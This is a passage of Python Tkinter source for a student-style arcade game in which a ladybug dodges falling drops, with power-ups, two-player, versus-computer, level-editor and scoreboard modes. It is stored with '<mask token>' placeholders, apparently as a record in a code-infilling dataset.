coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n 
data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n 
data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', 
font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 
2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if 
data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if 
(data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n 
addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if 
data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class 
Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\n<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = 
data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 
'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n 
data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n 
